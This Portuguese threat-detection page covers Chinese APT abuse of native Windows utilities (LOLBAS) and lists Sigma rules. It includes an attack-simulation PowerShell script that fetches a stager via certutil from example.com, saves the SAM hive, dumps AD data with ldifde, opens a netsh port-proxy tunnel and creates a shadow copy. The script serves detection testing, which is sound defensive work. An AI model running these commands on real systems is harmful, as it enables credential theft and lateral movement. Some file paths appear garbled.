Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
O artigo explora como grupos de ameaças persistentes avançadas chinesas abusam de utilitários embutidos do Windows, frequentemente referidos como LOLBAS, para realizar reconhecimento, roubar credenciais e mover-se lateralmente através de ambientes enquanto se misturam à rotina de atividades administrativas.
Investigação
Destaca o uso específico da linha de comando de ferramentas nativas como nltest, certutil, netsh, reg.exe, vssadmin, entre outras, e aponta para regras Sigma que podem ajudar a detectar essas técnicas dentro de plataformas SIEM.
Mitigação
Os defensores são incentivados a monitorar a execução suspeita de binários nativos do Windows, aplicar controles de acesso de privilégio mínimo, auditar modificações no registro e implantar lógica de detecção baseada nos padrões Sigma referidos.
Resposta
Quando uma atividade suspeita de LOLBAS é identificada, as equipes de segurança devem disparar um alerta, isolar o host afetado, coletar logs relevantes, confirmar se houve despejo de credenciais ou movimento lateral, e realizar uma análise forense em quaisquer artefatos resultantes.
Fluxo de Ataque
Ainda estamos atualizando esta parte. Inscreva-se para ser notificado
Notifique-meDetecções
Possível Enumeração de Sistema (via linha de comando)
Ver
Possível Enumeração/Manipulação de Conta ou Grupo (via linha de comando)
Ver
Descoberta Suspeita de Confianças de Domínio (via linha de comando)
Ver
LOLBAS wmic (via linha de comando)
Ver
LOLBAS DNSCmd (via linha de comando)
Ver
Usando Certutil para Codificação de Dados e Operações de Certificado (via linha de comando)
Ver
Atividade Suspeita do VSSADMIN (via linha de comando)
Ver
Possível Despejo de SAM/SYSTEM/SECURITY (via linha de comando)
Ver
Atividade Suspeita do Ntdsutil (via linha de comando)
Ver
Cópia Suspeita de SAM/SECURITY/NTDS.dit via Cópia de Sombra (via linha de comando)
Ver
Uso Suspeito de Utilitários do Windows para Reconhecimento e Roubo de Credenciais [Criação de Processo do Windows]
Ver
Execução de Simulação
Pré-requisito: O Check Pré‑Voo de Telemetria & Baseline deve ter sido aprovado.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e narrativa DEVEM refletir diretamente os TTPs identificados e têm como objetivo gerar a telemetria exata esperada pela lógica de detecção.
-
Narrativa & Comandos de Ataque:
Um invasor que obteve acesso inicial em uma workstation Windows conectada ao domínio busca mapear o domínio, enumerar grupos privilegiados e coletar material de credenciais usando apenas binários nativos para evitar disparar assinaturas de AV tradicionais. Os passos são:
- Enumerar Controladores de Domínio:
nltest /dclist:domain.local– revela todos os DCs no domínio alvo. - Coletar Informações do Sistema:
systeminfo– coleta versão do OS, patches e detalhes de hardware. - Listar Processos em Execução:
tasklist– fornece insight em serviços privilegiados. - Consultar Logs de Eventos do Windows para Eventos de Logon:
Get-EventLog -LogName Security -InstanceId 4624(PowerShell) – extrai eventos de logon bem-sucedidos. - Baixar um payload em estágio:
certutil -urlcache -split -f https://example.com/stager.exe C:WindowsTempstager.exe– usa certutil para ignorar filtros da web. - Enumerar Administradores Locais:
net localgroup administrators– identifica contas privilegiadas. - Exportar Hive do Registro SAM:
reg.exe save hklmsam C:sam.save– tenta despejar hashes de senha. - Criar Proxy de Porta para Movimento Lateral:
netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.0.0.5 connectport=3389– prepara um túnel. - Enumerar Registros DNS:
dnscmd . /enumrecords /zone– descobre zonas DNS internas. - Exportar objetos AD via LDIFDE:
ldifde.exe -f C:WindowsTempad_dump.txt -p subtree– extrai dados do diretório. - Criar uma Cópia de Sombra do Volume:
vssadmin create shadow /for=C:– permite acesso ao nível de arquivo a arquivos bloqueados.
Cada comando corresponde exatamente a uma das strings “CommandLine|contains” na regra Sigma, garantindo que a regra dispare nos eventos de criação de processo resultantes.
- Enumerar Controladores de Domínio:
-
Script de Teste de Regressão: (PowerShell – auto-contido, requer privilégios de administrador)
# TC-20260518-A7B9K – Simular uso adversário de utilitários nativos do Windows # NOTA: Execute em um host Windows conectado ao domínio com privilégios de admin. # 1. Enumeração de controladores de domínio nltest /dclist:domain.local # 2. Informações do sistema systeminfo # 3. Listar processos tasklist # 4. Extração de logs de evento de segurança (PowerShell) Get-EventLog -LogName security -InstanceId 4624 # 5. Baixar payload em estágio via certutil certutil -urlcache -split -f https://example.com/stager.exe C:WindowsTempstager.exe # 6. Enumerar administradores locais net localgroup administrators # 7. Exportar hive SAM reg.exe save hklmsam C:sam.save # 8. Configurar proxy de porta netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.0.0.5 connectport=3389 # 9. Enumeração de zona DNS dnscmd . /enumrecords /zone # 10. Exportar dados AD via LDIFDE ldifde.exe -f C:WindowsTempad_dump.txt -p subtree # 11. Criar uma cópia de sombra de volume vssadmin create shadow /for=C: -
Comandos de Limpeza:
# Remover arquivos criados durante a simulação Remove-Item -Path C:WindowsTempstager.exe -ErrorAction SilentlyContinue Remove-Item -Path C:sam.save -ErrorAction SilentlyContinue Remove-Item -Path C:WindowsTempad_dump.txt -ErrorAction SilentlyContinue # Excluir a regra de portproxy netsh interface portproxy delete v4tov4 listenport=4444 # Excluir a cópia de sombra (opcional – requer ID da cópia de sombra) # vssadmin delete shadows /for=C: /all /quiet